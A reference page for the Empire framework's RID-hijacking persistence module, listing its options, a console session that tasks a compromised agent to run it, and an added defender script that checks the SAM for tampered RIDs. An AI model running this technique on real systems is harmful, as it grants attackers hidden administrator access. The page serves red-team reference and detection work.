Invoke-RIDHijacking - Empire Module
This page contains detailed information about how to use the powershell/persistence/elevated/rid_hijack Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-RIDHijacking
Module: powershell/persistence/elevated/rid_hijack
Source code [1]: empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
Source code [2]: empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
MITRE ATT&CK:
T1003
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: No
The rid_hijack module runs Invoke-RIDHijacking, which assigns the desired privileges to an existing account by modifying the copy of the Relative Identifier (RID) value that Windows uses when it builds the account's access token. This module needs administrative privileges.
This module runs in the foreground (Background: No). Its metadata marks it OPSEC safe, but note that it changes the account's record in the SAM hive, so the modification is written to disk and can be picked up by AV/EDR or registry monitoring on the target system.
Note that the rid_hijack module needs administrative privileges to work properly (Needs admin: Yes), which means that a normal user cannot run this module.
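As an added defender-side check that is not part of Empire or of the module, the following script audits the artifact the technique leaves behind: each user key under the SAM is named after the account's real RID, so a key whose stored RID differs from its name has been tampered with. It assumes the publicly documented SAM layout (the RID is a little-endian DWORD at offset 0x30 of the F value) and must run as SYSTEM, since the SAM hive is not readable by ordinary administrators.

```powershell
# Added audit script (not Empire's code): flags SAM user records whose stored RID
# does not match the RID encoded in the key name. Run as SYSTEM, e.g. from a
# SYSTEM-level scheduled task or PsExec -s.
function Get-RidHijackCandidate {
    $usersKey = 'HKLM:\SAM\SAM\Domains\Account\Users'
    foreach ($key in Get-ChildItem -Path $usersKey -ErrorAction Stop) {
        # User keys are 8 hex digits (e.g. 000001F4 = 500); skip the 'Names' subkey
        if ($key.PSChildName -notmatch '^[0-9A-Fa-f]{8}$') { continue }
        $keyRid = [Convert]::ToUInt32($key.PSChildName, 16)
        $f = $key.GetValue('F')
        if (-not $f -or $f.Length -lt 0x34) { continue }
        # Assumption: the RID used for token creation sits at offset 0x30 of F
        $storedRid = [BitConverter]::ToUInt32($f, 0x30)
        [PSCustomObject]@{
            Key       = $key.PSChildName
            KeyRid    = $keyRid
            StoredRid = $storedRid
            Hijacked  = ($keyRid -ne $storedRid)
        }
    }
}

# Report only mismatches; an empty result means no RID tampering was found
Get-RidHijackCandidate | Where-Object Hijacked | Format-Table -AutoSize
```

A mismatch on a low-privilege or Guest key whose StoredRid is 500 is the classic RID-hijacking pattern; treat any mismatch as an incident until explained.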
Required Module Options
This is a list of options that are required by the rid_hijack module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the rid_hijack module:
Enable
Switch. Enable the defined account.
Password
Password to set to the defined account.
RID
RID to set to the specified account. Default 500.
Default value: 500
UseGuest
Switch. Set the defined RID to the Guest account.
User
User on which to set the defined RID.
Rid_hijack Example Usage
Here's an example of how to use the rid_hijack module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/rid_hijack
Author Sebastian Castro @r4wd3r
Background False
Comments https://github.com/r4wd3r/RID-Hijacking
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
https://csl.com.co/rid-hijacking/
Description Runs Invoke-RIDHijacking. Allows setting desired privileges to an
existent account by modifying the Relative Identifier value copy used
to create the access token. This module needs administrative
privileges.
Language powershell
Name powershell/persistence/elevated/rid_hijack
NeedsAdmin True
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1003
,Record Options----,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|----------|-------|----------|-------------------------------------|
| Enable | | False | Switch. Enable the defined account. |
|----------|-------|----------|-------------------------------------|
| Password | | False | Password to set to the defined |
| | | | account. |
|----------|-------|----------|-------------------------------------|
| RID | 500 | False | RID to set to the specified |
| | | | account. Default 500. |
|----------|-------|----------|-------------------------------------|
| UseGuest | | False | Switch. Set the defined RID to the |
| | | | Guest account. |
|----------|-------|----------|-------------------------------------|
| User | | False | User to set the defined RID. |
'----------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come back from the agent.
Author
- Sebastian Castro @r4wd3r
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
- https://github.com/r4wd3r/RID-Hijacking
- https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
- https://csl.com.co/rid-hijacking/
- http://attack.mitre.org/techniques/T1003
- https://gallery.technet.microsoft.com/scriptcenter/Enable-TSDuplicateToken-6f485980
- https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Get-username-fdcb6990
See Also
Also check the following modules related to this one:
- powershell/persistence/elevated/wmi_updater
- powershell/persistence/elevated/schtasks
- powershell/persistence/elevated/registry
- powershell/persistence/elevated/wmi
- powershell/privesc/powerup/write_dllhijacker
- powershell/privesc/powerup/find_dllhijack
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.